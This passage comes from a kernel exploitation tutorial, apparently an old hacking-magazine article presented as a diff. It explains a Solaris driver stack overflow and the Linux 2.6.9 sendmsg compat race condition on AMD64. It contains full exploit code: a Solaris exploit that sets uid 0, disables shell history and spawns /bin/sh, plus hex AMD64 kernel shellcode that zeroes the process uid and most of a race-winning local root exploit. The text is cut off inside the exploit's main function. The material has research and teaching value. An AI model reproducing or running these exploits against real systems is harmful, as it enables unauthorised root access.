+"\x08\xfe\x5f\xa0\x18\xbc\x27\xa7\xff\xbe\x07\xe0\xa8\x81"
+"\xc7\xe0\x08\x81\xe8\x00\x00";
+
+int main()
+{
+        execl("e", sc, NULL);
+        return 0;
+}
+bash-2.05$
+
+The shellcode is the one presented before. 
+
+Before showing the exploit code, let's just paste the vulnerable code,
+from the dummy driver provided for Solaris :
+
+< stuff/drivers/solaris/test.c >
+
+[...]
+
+static int handle_stack (intptr_t arg)
+{
+        char buf[32];
+        struct test_comunique t_c;
+
+        ddi_copyin((void *)arg, &t_c, sizeof(struct test_comunique), 0);
+
+        cmn_err(CE_CONT, "Requested to copy over buf %d bytes from %p\n",
+t_c.size, &buf);
+
+        ddi_copyin((void *)t_c.addr, buf, t_c.size, 0); [1]
+
+        return 0;
+}
+
+static int test_ioctl (dev_t dev, int cmd, intptr_t arg, int mode,
+                        cred_t *cred_p, int *rval_p )
+{
+    cmn_err(CE_CONT, "ioctl called : cred %d %d\n", cred_p->cr_uid,
+cred_p->cr_gid);
+
+    switch ( cmd )
+    {
+        case TEST_STACKOVF: {
+        	handle_stack(arg);
+	}
+
+[...]
+
+< / > 
+
+The vulnerability is quite self explanatory and is a lack of 'input
+sanitizing' before calling the ddi_copyin at [1]. 
+
+Exploit follows :
+
+< stuff/expl/solaris/e_stack.c >
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include "test.h"
+
+#define BUFSIZ 192
+
+char buf[192];
+
+typedef struct psinfo {
+        int     pr_flag;        /* process flags */
+        int     pr_nlwp;        /* number of lwps in process */
+        pid_t   pr_pid;         /* unique process id */
+        pid_t   pr_ppid;        /* process id of parent */
+        pid_t   pr_pgid;        /* pid of process group leader */
+        pid_t   pr_sid;         /* session id */
+        uid_t   pr_uid;         /* real user id */
+        uid_t   pr_euid;        /* effective user id */
+        gid_t   pr_gid;         /* real group id */
+        gid_t   pr_egid;        /* effective group id */
+        uintptr_t pr_addr;      /* address of process */
+        size_t  pr_size;        /* size of process image in Kbytes */
+} psinfo_t;
+
+#define ALIGNPAD        3
+
+#define PSINFO_PATH     "/proc/self/psinfo"
+
+unsigned long getaddr()
+{
+        psinfo_t        info;
+        int             fd;
+
+        fd = open(PSINFO_PATH, O_RDONLY);
+        if ( fd == -1)
+        {
+                perror("open");
+                return -1;
+        }
+
+        read(fd, (char *)&info, sizeof (info));
+        close(fd);
+        return info.pr_addr;
+}
+ 
+
+#define UPSARGS_OFFSET 0x330 + 0x161
+
+int exploit_me()
+{
+        char    *argv[] = { "princess", NULL };
+        char    *envp[] = { "TERM=vt100", "BASH_HISTORY=/dev/null",
+"HISTORY=/dev/null", "history=/dev/null",
+     "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin",
+"HISTFILE=/dev/null", NULL };
+
+         printf("Pleased to see you, my Princess\n");
+         setreuid(0, 0);
+         setregid(0, 0);
+         execve("/bin/sh", argv, envp);
+         exit(0);
+
+}
+
+#define SAFE_FP     0x0000000001800040 + 1
+#define DUMMY_FILE  "/tmp/test"
+
+int main()
+{
+        int                     fd;
+        int                     ret;
+        struct test_comunique   t;
+        unsigned long           *pbuf, retaddr, p_addr;
+
+        memset(buf, 'A', BUFSIZ);
+
+        p_addr = getaddr();
+
+        printf("[*] - Using proc_t addr : %p \n", p_addr);
+
+        retaddr = p_addr + UPSARGS_OFFSET + ALIGNPAD;
+
+        printf("[*] - Using ret addr : %p\n", retaddr);
+
+        pbuf = &buf[32];
+
+        pbuf += 2;
+
+        /* locals */
+
+        for ( ret = 0; ret < 14; ret++ )
+                *pbuf++ = 0xBBBBBBBB + ret;
+        *pbuf++ = SAFE_FP;
+        *pbuf = retaddr - 8;
+
+        t.size = sizeof(buf);
+        t.addr = buf;
+
+        fd = open(DUMMY_FILE, O_RDONLY);
+
+        ret = ioctl(fd, 1, &t);
+        printf("fun %d\n", ret);
+
+        exploit_me();
+        close(fd);
+
+}
+ 
+< / >
+
+The exploit is quite simple (we apologies, but we didn't have a public one
+to show at time of writing) : 
+
+  - getaddr() uses procfs exported psinfo data to get the proc_t address
+    of the running process.
+
+  - the return addr is calculated from proc_t addr + the offset of the
+    u_psargs array + the three needed bytes for alignment
+ 
+  - SAFE_FP points just 'somewhere in the data segment' (and ready to be
+    biased for the real dereference). Due to SPARC window mechanism we
+    have to provide a valid address that it will be used to 'load' the
+    saved procedure registers upon re-entering. We don't write on that
+    address so whatever readable kernel part is safe. (in more complex 
+    scenarios you could have to write over too, so take care). 
+
+  - /tmp/test is just a link to the /devices/pseudo/test@0:0 file      
+  
+  - the exploit has to be compiled as a 32-bit executable, so that the
+    syscall_trap32 offset is meaningful 
+  
+
+You can compile and test the driver on your boxes, it's really simple. You
+can extend it to test more scenarios, the skeleton is ready for it.
+
+
+------[ 2.4 - A primer on logical bugs : race conditions
+
+
+Heap and Stack Overflow (even more, NULL pointer dereference) are 
+seldomly found on their own, and, since the automatic and human auditing
+work goes on and on, they're going to be even more rare. 
+What will probably survive for more time are 'logical bugs', which may
+lead, at the end, to a classic overflow. 
+Figure out a modelization of 'logical bugs' is, in our opinion, nearly 
+impossible, each one is a story on itself.
+Notwithstanding this, one typology of those is quite interesting (and
+'widespread') and at least some basic approaches to it are suitable for a
+generic description. 
+
+We're talking about 'race conditions'. 
+
+In short, we have a race condition everytime we have a small window of
+time that we can use to subvert the operating system behaviour. A race
+condition is usually the consequence of a forgotten lock or other
+syncronization primitive or the use of a variable 'too much time after'
+the sanitizing of its value. Just point your favorite vuln database search
+engine towards 'kernel race condition' and you'll find many different
+examples. 
+
+Winning the race is our goal. This is easier on SMP systems, since the two 
+racing threads (the one following the 'raceable kernel path' and the other
+competing to win the race) can be scheduled (and be bounded) on different
+CPUs. We just need to have the 'racing thread' go faster than the other 
+one, since they both can execute in parallel.
+Winning a race on UP is harder : we have to force the first kernel path
+to sleep (and thus to re-schedule). We have also to 'force' the scheduler
+into selecting our 'racing' thread, so we have to take care of scheduling
+algorithm implementation (ex. priority based). On a system with a low CPU
+load this is generally easy to get : the racing thread is usually
+'spinning' on some condition and is likely the best candidate on the
+runqueue. 
+
+We're going now to focus more on 'forcing' a kernel path to sleep,
+analyzing the nowadays common interface to access files, the page cache. 
+After that we'll present the AMD64 architecture and show a real race
+exploit for Linux on it, based on the sendmsg [5] vulnerability.
+Winning the race in that case turns the vuln into a stack based one, so
+the discussion will analize stack based explotation on Linux/AMD64 too.
+
+
+---[ 2.4.1 - Forcing a kernel path to sleep 
+
+  
+If you want to win a race, what's better than slowing down your opponent?
+And what's slower than accessing the hard disk, in a modern computer ? 
+Operating systems designers know that the I/O over the disk is one of the
+major bottleneck on system performances and know aswell that it is one of
+the most frequent operations requested. 
+
+Disk accessing and Virtual Memory are closely tied : virtual memory needs
+to access the disk to accomplish demand paging and in/out swapping, while
+the filesystem based I/O (both direct read/write and memory mapping of
+files) works in units of pages and relays on VM functions to perform the
+write out of 'dirty' pages. Moreover, to sensibly increase performances,
+frequently accessed disk pages are kept in RAM, into the so-called 'Page
+Cache'. 
+
+Since RAM isn't an inexhaustible resource, pages to be loaded and 'cached'
+into it have to be carefully 'selected'. The first skimming is made by the
+'Demand Paging' approach : a page is loaded from disk into memory only
+when it is referenced, by the page fault handler code. 
+Once a filesystem page is loaded into memory, it enters into the 'Page
+Cache' and stays in memory for an unspecified time (depending on disk
+activity and RAM availability, generally a LRU policy is used as an
+evict-policy). 
+Since it's quite common for an userland application to repeatedly access
+the same disk content/pages (or for different applications, to access
+common files), the 'Page Cache' sensibly increases performances.
+
+One last thing that we have to discuss is the filesystem 'page clustering'.
+Another common principle in 'caching' is the 'locality'. Pages near the
+referenced one are likely to be accessed in a near future and since we're
+accessing the disk we can avoid the future seek-rotation latency if we
+load in more pages after the referenced one. How many to load is
+determined by the page cluster value. 
+On Linux that value is 3, so 2^3 pages are loaded after the referenced
+one. On Solaris, if the pages are 8-kb sized, the next eight pages on a
+64kb boundary are brought in by the seg_vn driver (mmap-case).
+
+Putting all together, if we want to force a kernel path to sleep we need
+to make it reference an un-cached page, so that a 'fault' happens due to
+demand paging implementation. The page fault handler needs to perform disk 
+I/O, so the process is put to sleep and another one is selected by the
+scheduler. Since probably we want aswell our 'controlled contents' to be
+at the faulting address we need to mmap the pages, modify them and then
+exhaust the page cache before making the kernel re-access them again. 
+
+Filling the 'page cache' has also the effect of consuming a large quantity
+of RAM and thus increasing the in/out swapping. On modern operating
+systems one can't create a condition of memory pressure only by exhausting
+the page cache (as it was possible on very old implementations), since
+only some amount of RAM is dedicated to the Page Cache and it would keep
+on stealing pages from itself, leaving other subsystems free to perform
+well. But we can manage to exhaust those subsystem aswell, for example by
+making the kernel do a large amount of 'surviving' slab-allocations. 
+
+Working to put the VM under pressure is something to take always in mind,
+since, done that, one can manage to slow down the kernel (favouring races)
+and make kmalloc or other allocation function to fail. (A thing that
+seldomly happens on normal behaviour). 
+
+It is time, now, for another real life situation. We'll show the sendmsg
+[5] vulnerability and exploiting code and we'll describe briefly the AMD64
+architectural more exploiting-relevant details.  
+   
+
+---[ 2.4.2 - AMD64 and race condition exploiting: sendmsg
+
+
+AMD64 is the 64-bit 'extension' of the x86 architecture, which is natively
+supported. It supports 64-bit registers, pointers/virtual addresses and
+integer/logic operations. AMD64 has two primary modes of operation, 'Long
+mode', which is the standard 64-bit one (32-bit and 16-bit binaries can be
+still run with almost no performance impact, or even, if recompiled, with
+some benefit from the extended number of registers, thanks to the
+sometimes-called 'compatibility mode') and 'Legacy mode', for 32-bit 
+operating systems, which is basically just like having a standard x86
+processor environment.
+
+Even if we won't use all of them in the sendmsg exploit, we're going now
+to sum a couple of interesting features of the AMD64 architecture :
+
+  - The number of general purpose register has been extended from 8 up to 
+    16. The registers are all 64-bit long (referred with 'r[name|num]',
+    f.e. rax, r10). Just like what happened when took over the transition
+    from 16-bit to 32-bit, the lower 32-bit of general purpose register 
+    are accessible with the 'e' prefix (f.e. eax).
+
+  - push/pop on the stack are 64-bit operations, so 8 bytes are
+    pushed/popped each time. Pointers are 64-bit too and that allows a
+    theorical virtual address space of 2^64 bytes. As happens for the
+    UltraSPARC architecture, current implementations address a limited
+    virtual address space (2^48 bytes) and thus have a VA-hole (the least
+    significant 48 bits are used and bits from 48 up to 63 must be copies
+    of bit 47 : the hole is thus between 0x7FFFFFFFFFFF and
+    0xFFFF800000000000). 
+    This limitation is strictly implementation-dependant, so any future
+    implementation might take advantage of the full 2^64 bytes range.  
+ 
+  - It is now possible to reference data relative to the Instruction
+    Pointer register (RIP). This is both a good and a bad news, since it
+    makes easier writing position independent (shell)code, but also makes
+    it more efficient (opening the way for more performant PIE-alike
+    implementations)
+
+  - The (in)famous NX bit (bit 63 of the page table entry) is implemented
+    and so pages can be marked as No-Exec by the operating system. This is 
+    less an issue than over UltraSPARC since actually there's no operating
+    system which implements a separated userspace/kernelspace addressing,
+    thus leaving open space to the use of the 'return-to-userspace'
+    tecnique. 
+
+  - AMD64 doesn't support anymore (in 'long mode') the use of
+    segmentation. This choice makes harder, in our opinion, the creation
+    of a separated user/kernel address space. Moreover the FS and GS
+    registers are still used for different pourposes. As we'll see, the
+    Linux Operating System keeps the GS register pointing to the 'current'
+    PDA (Per Processor Data Structure). (check : /include/asm-x86_64/pda.h 
+    struct x8664_pda .. anyway we'll get back on that in a short).
+
+
+After this brief summary (if you want to learn more about the AMD64
+architecture you can check the reference manuals at [3]) it is time now to
+focus over the 'real vulnerability', the sendmsg [5] one : 
+
+"When we copy 32bit ->msg_control contents to kernel, we walk the
+same userland data twice without sanity checks on the second pass.
+Moreover, if original looks small enough, we end up copying to on-stack
+array."
+       
+< linux-2.6.9/net/compat.c >
+
+int cmsghdr_from_user_compat_to_kern(struct msghdr *kmsg,
+                               unsigned char *stackbuf, int stackbuf_size)
+{
+        struct compat_cmsghdr __user *ucmsg;
+        struct cmsghdr *kcmsg, *kcmsg_base;
+        compat_size_t ucmlen;
+        __kernel_size_t kcmlen, tmp;
+
+        kcmlen = 0;
+        kcmsg_base = kcmsg = (struct cmsghdr *)stackbuf;            [1]
+
+[...]
+
+        while(ucmsg != NULL) {
+                if(get_user(ucmlen, &ucmsg->cmsg_len))              [2]
+                        return -EFAULT;
+
+                /* Catch bogons. */
+                if(CMSG_COMPAT_ALIGN(ucmlen) <
+                   CMSG_COMPAT_ALIGN(sizeof(struct compat_cmsghdr)))
+                        return -EINVAL;
+                if((unsigned long)(((char __user *)ucmsg - (char __user
+*)kmsg->msg_control)
+                                   + ucmlen) > kmsg->msg_controllen) [3]
+                        return -EINVAL;
+
+                tmp = ((ucmlen - CMSG_COMPAT_ALIGN(sizeof(*ucmsg))) +
+                       CMSG_ALIGN(sizeof(struct cmsghdr)));
+                kcmlen += tmp;                                       [4]
+                ucmsg = cmsg_compat_nxthdr(kmsg, ucmsg, ucmlen);
+        }
+
+[...]
+
+        if(kcmlen > stackbuf_size)                                   [5] 
+                kcmsg_base = kcmsg = kmalloc(kcmlen, GFP_KERNEL);
+
+[...]
+
+        while(ucmsg != NULL) {
+                __get_user(ucmlen, &ucmsg->cmsg_len);                [6]
+                tmp = ((ucmlen - CMSG_COMPAT_ALIGN(sizeof(*ucmsg))) +
+                       CMSG_ALIGN(sizeof(struct cmsghdr)));
+                kcmsg->cmsg_len = tmp;
+                __get_user(kcmsg->cmsg_level, &ucmsg->cmsg_level);
+                __get_user(kcmsg->cmsg_type, &ucmsg->cmsg_type);
+
+                /* Copy over the data. */
+                if(copy_from_user(CMSG_DATA(kcmsg),                  [7]
+                                  CMSG_COMPAT_DATA(ucmsg),
+                                  (ucmlen -
+CMSG_COMPAT_ALIGN(sizeof(*ucmsg)))))
+                        goto out_free_efault;
+
+
+< / >
+
+
+As it is said in the advisory, the vulnerability is a double-reference to
+some userland data (at [2] and at [6]) without sanitizing the value the
+second time it is got from the userland (at [3] the check is performed,
+instead). That 'data' is the 'size' of the user-part to copy-in
+('ucmlen'), and it's used, at [7], inside the copy_from_user. 
+
+This is a pretty common scenario for a race condition : if we create two
+different threads, make the first one enter the codepath and , after [4],
+we manage to put it to sleep and make the scheduler choice the other
+thread, we can change the 'ucmlen' value and thus perform a 'buffer
+overflow'. 
+
+The kind of overflow we're going to perform is 'decided' at [5] : if the
+len is little, the buffer used will be in the stack, otherwise it will be
+kmalloc'ed. Both the situation are exploitable, but we've chosen the stack
+based one (we have already presented a slab exploit for the Linux
+operating system before). We're going to use, inside the exploit, the
+tecnique we've presented in the subsection before to force a process to
+sleep, that is making it access data on a cross page boundary (with the
+second page never referenced before nor already swapped in by the page
+clustering mechanism) :
+
++------------+ --------> 0x20020000 [MMAP_ADDR + 32 * PAGE_SIZE] [*]
+|            |
+| cmsg_len   |           first cmsg_len starts at 0x2001fff4
+| cmsg_level |           first struct compat_cmsghdr
+| cmsg_type  |
+|------------| -------->              0x20020000  [cross page boundary]
+| cmsg_len   |           second cmsg_len starts at 0x20020000)
+| cmsg_level |           second struct compat_cmsghdr
+| cmsg_type  |
+|            |
++------------+ --------> 0x20021000
+
+[*] One of those so-called 'runtime adjustement'. The page clustering
+    wasn't showing the expected behaviour in the first 32 mmaped-pages,
+    while was just working as expected after.
+
+
+As we said, we're going to perform a stack-based explotation writing past
+the 'stackbuf' variable. Let's see where we get it from : 
+
+< linux-2.6.9/net/socket.c > 
+
+asmlinkage long sys_sendmsg(int fd, struct msghdr __user *msg, unsigned
+flags)
+{
+        struct compat_msghdr __user *msg_compat =
+        (struct compat_msghdr __user *)msg;
+        struct socket *sock;
+        char address[MAX_SOCK_ADDR];
+        struct iovec iovstack[UIO_FASTIOV], *iov = iovstack;
+        unsigned char ctl[sizeof(struct cmsghdr) + 20];
+        unsigned char *ctl_buf = ctl;
+        struct msghdr msg_sys;
+        int err, ctl_len, iov_size, total_len;
+[...]
+
+        if ((MSG_CMSG_COMPAT & flags) && ctl_len) {
+err = cmsghdr_from_user_compat_to_kern(&msg_sys, ctl, sizeof(ctl));
+
+[...]
+
+< / >
+
+The situation is less nasty as it seems (at least on the systems we tested
+the code on) : thanks to gcc reordering the stack variables we get our
+'msg_sys' struct placed as if it was the first variable.
+That simplifies a lot our exploiting task, since we don't have to take
+care of 'emulating' in userspace the structure referenced between our
+overflow and the 'return' of the function (for example the struct sock).
+Exploiting in this 'second case' would be slightly more complex, but
+doable aswell.
+
+The shellcode for the exploit is not much different (as expected, since
+the AMD64 is a 'superset' of the x86 architecture) from the ones provided
+before for the Linux/x86 environment, netherless we've two focus on two
+important different points : the 'thread/task struct dereference' and the
+'userspace context switch approach'. 
+
+For the first point, let's start analyzing the get_current()
+implementation : 
+
+< linux-2.6.9/include/asm-x86_64/current.h >
+
+#include <asm/pda.h>
+
+static inline struct task_struct *get_current(void)
+{
+        struct task_struct *t = read_pda(pcurrent);
+        return t;
+}
+
+#define current get_current()
+
+[...]
+
+#define GET_CURRENT(reg) movq %gs:(pda_pcurrent),reg
+
+< / > 
+
+< linux-2.6.9/include/asm-x86_64/pda.h >
+
+struct x8664_pda {
+        struct task_struct *pcurrent;   /* Current process */
+        unsigned long data_offset;      /* Per cpu data offset from linker
+address */
+        struct x8664_pda *me;       /* Pointer to itself */
+        unsigned long kernelstack;  /* top of kernel stack for current */
+[...]
+
+#define pda_from_op(op,field) ({ \
+       typedef typeof_field(struct x8664_pda, field) T__; T__ ret__; \
+       switch (sizeof_field(struct x8664_pda, field)) {                 \
+case 2: \
+asm volatile(op "w %%gs:%P1,%0":"=r"
+(ret__):"i"(pda_offset(field)):"memory"); break;\
+[...]
+
+#define read_pda(field) pda_from_op("mov",field)
+ 
+< / > 
+
+The task_struct is thus no more into the 'current stack' (more precisely,
+referenced from the thread_struct which is actually saved into the
+'current stack'), but is stored into the 'struct x8664_pda'. This struct
+keeps many information relative to the 'current' process and the CPU it is
+running over (kernel stack address, irq nesting counter, cpu it is running
+over, number of NMI on that cpu, etc).
+As you can see from the 'pda_from_op' macro, during the execution of a
+Kernel Path, the address of the 'struct x8664_pda' is kept inside the %gs
+register. Moreover, the 'pcurrent' member (which is the one we're actually
+interested in) is the first one, so obtaining it from inside a shellcode
+is just a matter of doing a : 
+
+	movq %gs:0x0, %rax 
+
+From that point on the 'scanning' to locate uid/gid/etc is just the same
+used in the previously shown exploits. 
+
+The second point which quite differs from the x86 case is the 'restore'
+part (which is, also, a direct consequence of the %gs using). 
+First of all we have to do a '64-bit based' restore, that is we've to push
+the 64-bit registers RIP,CC,RFLAGS,RSP and SS and call, at the end, the
+'iretq' instruction (the extended version of the 'iret' one on x86).
+Just before returning we've to remember to perform the 'swapgs'
+instruction, which swaps the %gs content with the one of the KernelGSbase
+(MSR address C000_0102h).
+If we don't perform the gs restoring, at the next syscall or interrupt the
+kernel will use an invalid value for the gs register and will just crash. 
+
+Here's the shellcode in asm inline notation :
+
+void stub64bit()
+{
+asm volatile (
+                "movl %0, %%esi\t\n"
+                "movq %%gs:0, %%rax\n"
+                "xor %%ecx, %%ecx\t\n"
+                "1: cmp $0x12c, %%ecx\t\n"
+                "je 4f\t\n"
+                "movl (%%rax), %%edx\t\n"
+                "cmpl %%esi, %%edx\t\n"
+                "jne 3f\t\n"
+                "movl 0x4(%%rax),%%edx\t\n"
+                "cmp %%esi, %%edx\t\n"
+                "jne 3f\t\n"
+                "xor %%edx, %%edx\t\n"
+                "movl %%edx, 0x4(%%rax)\t\n"
+                "jmp 4f\t\n"
+                "3: add $4,%%rax\t\n"
+                "inc %%ecx\t\n"
+                "jmp 1b\t\n"
+                "4:\t\n"
+                "swapgs\t\n"
+                "movq $0x000000000000002b,0x20(%%rsp)\t\n"
+                "movq %1,0x18(%%rsp)\t\n"
+                "movq $0x0000000000000246,0x10(%%rsp)\t\n"
+                "movq $0x0000000000000023,0x8(%%rsp)\t\n"
+                "movq %2,0x0(%%rsp)\t\n"
+                "iretq\t\n"
+                : : "i"(UID), "i"(STACK_OFFSET), "i"(CODE_OFFSET)
+                );
+}
+
+With UID being the 'uid' of the current running process and STACK_OFFSET
+and CODE_OFFSET the address of the stack and code 'segment' we're
+returning into in userspace. All those values are taken and patched at
+runtime in the exploit 'make_kjump' function : 
+
+< stuff/expl/linux/sracemsg.c > 
+
+#define PAGE_SIZE 0x1000
+#define MMAP_ADDR ((void*)0x20000000)
+#define MMAP_NULL ((void*)0x00000000)
+#define PAGE_NUM 128
+
+#define PATCH_CODE(base,offset,value) \
+       *((uint32_t *)((char*)base + offset)) = (uint32_t)(value)
+
+#define fatal_errno(x,y) { perror(x); exit(y); }
+
+struct cmsghdr *g_ancillary;
+
+/* global shared value to sync threads for race */
+volatile static int glob_race = 0;
+
+#define UID_OFFSET 1
+#define STACK_OFF_OFFSET 69
+#define CODE_OFF_OFFSET  95
+
+[...]
+
+int make_kjump(void)
+{
+  void *stack_map = mmap((void*)(0x11110000), 0x2000,
+PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, 0, 0);
+  if(stack_map == MAP_FAILED)
+    fatal_errno("mmap", 1);
+
+
+  void *shellcode_map = mmap(MMAP_NULL, 0x1000,
+PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, 0,
+0);
+  if(shellcode_map == MAP_FAILED)
+    fatal_errno("mmap", 1);
+
+  memcpy(shellcode_map, kernel_stub, sizeof(kernel_stub)-1);
+
+  PATCH_CODE(MMAP_NULL, UID_OFFSET, getuid());
+  PATCH_CODE(MMAP_NULL, STACK_OFF_OFFSET, 0x11111111);
+  PATCH_CODE(MMAP_NULL, CODE_OFF_OFFSET,  &eip_do_exit);
+}
+
+< / > 
+ 
+
+The rest of the exploit should be quite self-explanatory and we're going
+to show the code here after in a short. Note the lowering of the priority
+inside start_thread_priority ('nice(19)'), so that we have some more
+chance to win the race (the 'glob_race' variable works just like a
+spinning lock for the main thread - check 'race_func()').
+
+As a last note, we use the 'rdtsc' (read time stamp counter) instruction
+to calculate the time that intercurred while trying to win the race. If
+this gap is high it is quite probable that a scheduling happened. 
+The task of 'flushing all pages' (inside page cache), so that we'll be
+sure that we'll end using demand paging on cross boundary access, is not
+implemented inside the code (it could have been easily added) and is left
+to the exploit runner. Since we have to create the file with controlled
+data, those pages end up cached in the page cache. We have to force the
+subsystem into discarding them. It shouldn't be hard for you, if you
+followed the discussion so far, to perform tasks that would 'flush the
+needed pages' (to disk) or add code to automatize it. (hint : mass find &
+cat * > /dev/null is an idea).
+
+Last but not least, since the vulnerable function is inside 'compat.c',
+which is the 'compatibility mode' to run 32-bit based binaries, remember to
+compile the exploit with the -m32 flag.
+
+< stuff/expl/linux/sracemsg.c >
+   
+#include <stdio.h>
+#include <signal.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdint.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sys/mman.h>
+#include <sched.h>
+#include <sys/socket.h>
+
+#define PAGE_SIZE 0x1000
+#define MMAP_ADDR ((void*)0x20000000)
+#define MMAP_NULL ((void*)0x00000000)
+#define PAGE_NUM 128
+
+#define PATCH_CODE(base,offset,value) \
+       *((uint32_t *)((char*)base + offset)) = (uint32_t)(value)
+
+#define fatal_errno(x,y) { perror(x); exit(y); }
+
+struct cmsghdr *g_ancillary;
+
+/* global shared value to sync threads for race */
+volatile static int glob_race = 0;
+
+#define UID_OFFSET 1
+#define STACK_OFF_OFFSET 69
+#define CODE_OFF_OFFSET  95
+
+char kernel_stub[] =
+
+"\xbe\xe8\x03\x00\x00"                   //  mov    $0x3e8,%esi
+"\x65\x48\x8b\x04\x25\x00\x00\x00\x00"   //  mov    %gs:0x0,%rax
+"\x31\xc9"                               //  xor    %ecx,%ecx  (15
+"\x81\xf9\x2c\x01\x00\x00"               //  cmp    $0x12c,%ecx
+"\x74\x1c"                               //  je     400af0
+<stub64bit+0x38>
+"\x8b\x10"                               //  mov    (%rax),%edx
+"\x39\xf2"                               //  cmp    %esi,%edx
+"\x75\x0e"                               //  jne    400ae8
+<stub64bit+0x30>
+"\x8b\x50\x04"                           //  mov    0x4(%rax),%edx
+"\x39\xf2"                               //  cmp    %esi,%edx
+"\x75\x07"                               //  jne    400ae8
+<stub64bit+0x30>
+"\x31\xd2"                               //  xor    %edx,%edx
+"\x89\x50\x04"                           //  mov    %edx,0x4(%rax)
+"\xeb\x08"                               //  jmp    400af0
+<stub64bit+0x38>
+"\x48\x83\xc0\x04"                       //  add    $0x4,%rax
+"\xff\xc1"                               //  inc    %ecx
+"\xeb\xdc"                               //  jmp    400acc
+<stub64bit+0x14>
+"\x0f\x01\xf8"                           //  swapgs (54
+"\x48\xc7\x44\x24\x20\x2b\x00\x00\x00"   //  movq   $0x2b,0x20(%rsp)
+"\x48\xc7\x44\x24\x18\x11\x11\x11\x11"   //  movq   $0x11111111,0x18(%rsp)
+"\x48\xc7\x44\x24\x10\x46\x02\x00\x00"   //  movq   $0x246,0x10(%rsp)
+"\x48\xc7\x44\x24\x08\x23\x00\x00\x00"   //  movq   $0x23,0x8(%rsp)  /* 23
+32-bit , 33 64-bit cs */
+"\x48\xc7\x04\x24\x22\x22\x22\x22"       //  movq   $0x22222222,(%rsp)
+"\x48\xcf";                              //  iretq
+
+
+void eip_do_exit(void)
+{
+  char *argvx[] = {"/bin/sh", NULL};
+  printf("uid=%d\n", geteuid());
+  execve("/bin/sh", argvx, NULL);
+  exit(1);
+}
+
+
+/*
+ * This function maps stack and code segment
+ * - 0x0000000000000000 - 0x0000000000001000   (future code space)
+ * - 0x0000000011110000 - 0x0000000011112000   (future stack space)
+ */
+
+int make_kjump(void)
+{
+  void *stack_map = mmap((void*)(0x11110000), 0x2000,
+PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, 0, 0);
+  if(stack_map == MAP_FAILED)
+    fatal_errno("mmap", 1);
+
+
+  void *shellcode_map = mmap(MMAP_NULL, 0x1000,
+PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, 0,
+0);
+  if(shellcode_map == MAP_FAILED)
+    fatal_errno("mmap", 1);
+
+  memcpy(shellcode_map, kernel_stub, sizeof(kernel_stub)-1);
+
+  PATCH_CODE(MMAP_NULL, UID_OFFSET, getuid());
+  PATCH_CODE(MMAP_NULL, STACK_OFF_OFFSET, 0x11111111);
+  PATCH_CODE(MMAP_NULL, CODE_OFF_OFFSET,  &eip_do_exit);
+}
+
+int start_thread_priority(int (*f)(void *), void* arg)
+{
+  char *stack = malloc(PAGE_SIZE*4);
+  int tid = clone(f, stack + PAGE_SIZE*4 -4,
+CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VM, arg);
+  if(tid < 0)
+  fatal_errno("clone", 1);
+
+  nice(19);
+  sleep(1);
+  return tid;
+}
+
+int race_func(void* noarg)
+{
+  printf("[*] thread racer getpid()=%d\n", getpid());
+  while(1)
+  {
+    if(glob_race)
+    {
+      g_ancillary->cmsg_len = 500;
+      return;
+    }
+  }
+}
+
+uint64_t tsc()
+{
+  uint64_t ret;
+  asm volatile("rdtsc" : "=A"(ret));
+
+  return ret;
+}
+
+struct tsc_stamp
+{
+  uint64_t before;
+  uint64_t after;
+  uint32_t access;
+};
+
+struct tsc_stamp stamp[128];
+
+inline char *flat_file_mmap(int fs)
+{
+  void *addr = mmap(MMAP_ADDR, PAGE_SIZE*PAGE_NUM, PROT_READ|PROT_WRITE,
+MAP_SHARED|MAP_FIXED, fs, 0);
+  if(addr == MAP_FAILED)
+    fatal_errno("mmap", 1);
+  return (char*)addr;
+}
+
+void scan_addr(char *memory)
+{
+  int i;
+  for(i=1; i<PAGE_NUM-1; i++)
+  {
+    stamp[i].access = (uint32_t)(memory + i*PAGE_SIZE);
+    uint32_t dummy = *((uint32_t *)(memory + i*PAGE_SIZE-4));
+    stamp[i].before = tsc();
+    dummy = *((uint32_t *)(memory + i*PAGE_SIZE));
+    stamp[i].after  = tsc();
+
+  }
+}
+
+/* make code access first 32 pages to flush page-cluster */
+/* access: 0x20000000 - 0x2000XXXX */
+
+void start_flush_access(char *memory, uint32_t page_num)
+{
+  int i;
+  for(i=0; i<page_num; i++)
+  {
+    uint32_t dummy = *((uint32_t *)(memory + i*PAGE_SIZE));
+  }
+}
+
+
+void print_single_result(struct tsc_stamp *entry)
+{
+  printf("Accessing: %p, tsc-difference: %lld\n", entry->access,
+entry->after - entry->before);
+}
+
+
+void print_result()
+{
+  int i;
+  for(i=1; i<PAGE_NUM-1; i++)
+  {
+    printf("Accessing: %p, tsc-difference: %lld\n", stamp[i].access,
+stamp[i].after - stamp[i].before);
+  }
+}
+
+
+void fill_ancillary(struct msghdr *msg, char *ancillary)
+{
+  msg->msg_control = ((ancillary + 32*PAGE_SIZE) - sizeof(struct
+cmsghdr));
+  msg->msg_controllen = sizeof(struct cmsghdr) * 2;
+
+  /* set global var thread race ancillary data chunk */
+  g_ancillary = msg->msg_control;
+
+  struct cmsghdr* tmp = (struct cmsghdr *)(msg->msg_control);
+  tmp->cmsg_len   = sizeof(struct cmsghdr);
+  tmp->cmsg_level = 0;
+  tmp->cmsg_type  = 0;
+  tmp++;
+
+  tmp->cmsg_len   = sizeof(struct cmsghdr);
+  tmp->cmsg_level = 0;
+  tmp->cmsg_type  = 0;
+  tmp++;
+
+  memset(tmp, 0x00, 172);
+}
+
+int main()
+{
+  struct tsc_stamp single_stamp = {0};
+  struct msghdr msg = {0};
+
+  memset(&stamp, 0x00, sizeof(stamp));
+  int fd = open("/tmp/file", O_RDWR);
+  if(fd == -1)
+    fatal_errno("open", 1);
+
